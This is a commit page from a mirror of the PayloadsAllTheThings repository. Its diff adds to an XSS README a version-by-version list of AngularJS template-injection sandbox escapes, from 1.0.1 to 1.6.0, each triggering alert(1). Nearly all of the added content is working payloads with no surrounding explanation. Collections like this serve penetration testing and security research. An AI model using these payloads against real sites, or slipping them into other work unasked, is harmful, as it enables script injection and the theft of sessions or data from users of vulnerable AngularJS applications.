ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-20 03:16:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Update XSS with AngularJS Bypass 1.1.0 to 1.6.0

Browse Source
This commit is contained in:
swisskyrepo 2017-01-15 19:14:39 +01:00
parent bb238f7301
commit b01c249da8
1 changed files with 113 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

112
XSS injection/README.md
View File

@ -223,6 +223,117 @@ From : http://www.thespanner.co.uk/2014/03/21/rpo/
IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute.
## XSS in Angular
Angular 1.6.0
```
{{0[a='constructor'][a]('alert(1)')()}}
```
Angular 1.5.9
```
{{
c=''.sub.call;b=''.sub.bind;a=''.sub.apply;
c.$apply=$apply;c.$eval=b;op=$root.$$phase;
$root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString;
C=c.$apply(c);$root.$$phase=op;$root.$digest=od;
B=C(b,c,b);$evalAsync("
astNode=pop();astNode.type='UnaryExpression';
astNode.operator='(window.X?void0:(window.X=true,alert(1)))+';
astNode.argument={type:'Identifier',name:'foo'};
");
m1=B($$asyncQueue.pop().expression,null,$root);
m2=B(C,null,m1);[].push.apply=m2;a=''.sub;
$eval('a(b.c)');[].push.apply=a;
}}
```
Angular 1.5.0 - 1.5.8
```
{{x = {'y':''.constructor.prototype}; x['y'].charAt=[].join;$eval('x=alert(1)');}}
```
Angular 1.4.0 - 1.4.9
```
{{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1)//');}}
```
Angular 1.3.20
```
{{'a'.constructor.prototype.charAt=[].join;$eval('x=alert(1)');}}
```
Angular 1.3.19
```
{{
'a'[{toString:false,valueOf:[].join,length:1,0:'__proto__'}].charAt=[].join;
$eval('x=alert(1)//');
}}
```
Angular 1.3.3 - 1.3.18
```
{{{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=[].join;
$eval('x=alert(1)//'); }}
```
Angular 1.3.1 - 1.3.2
```
{{
{}[{toString:[].join,length:1,0:'__proto__'}].assign=[].join;
'a'.constructor.prototype.charAt=''.valueOf;
$eval('x=alert(1)//');
}}
```
Angular 1.3.0
```
{{!ready && (ready = true) && (
!call
? $$watchers[0].get(toString.constructor.prototype)
: (a = apply) &&
(apply = constructor) &&
(valueOf = call) &&
(''+''.toString(
'F = Function.prototype;' +
'F.apply = F.a;' +
'delete F.a;' +
'delete F.valueOf;' +
'alert(1);'
))
);}}
```
Angular 1.2.24 - 1.2.29
```
{{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}
```
Angular 1.2.19 - 1.2.23
```
{{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor);}}
```
Angular 1.2.6 - 1.2.18
```
{{(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()}}
```
Angular 1.2.2 - 1.2.5
```
{{'a'[{toString:[].join,length:1,0:'__proto__'}].charAt=''.valueOf;$eval("x='"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+"'");}}
```
Angular 1.2.0 - 1.2.1
```
{{a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()}}
```
Angular 1.0.1 - 1.1.5
```
{{constructor.constructor('alert(1)')()}}
```
## Polyglot XSS ## Polyglot XSS
Polyglot XSS - 0xsobky Polyglot XSS - 0xsobky
``` ```
@ -405,3 +516,4 @@ Exotic payloads
* http://blog.innerht.ml/rpo-gadgets/ * http://blog.innerht.ml/rpo-gadgets/
* http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite * http://support.detectify.com/customer/portal/articles/2088351-relative-path-overwrite
* http://d3adend.org/xss/ghettoBypass * http://d3adend.org/xss/ghettoBypass
* http://blog.portswigger.net/2016/01/xss-without-html-client-side-template.html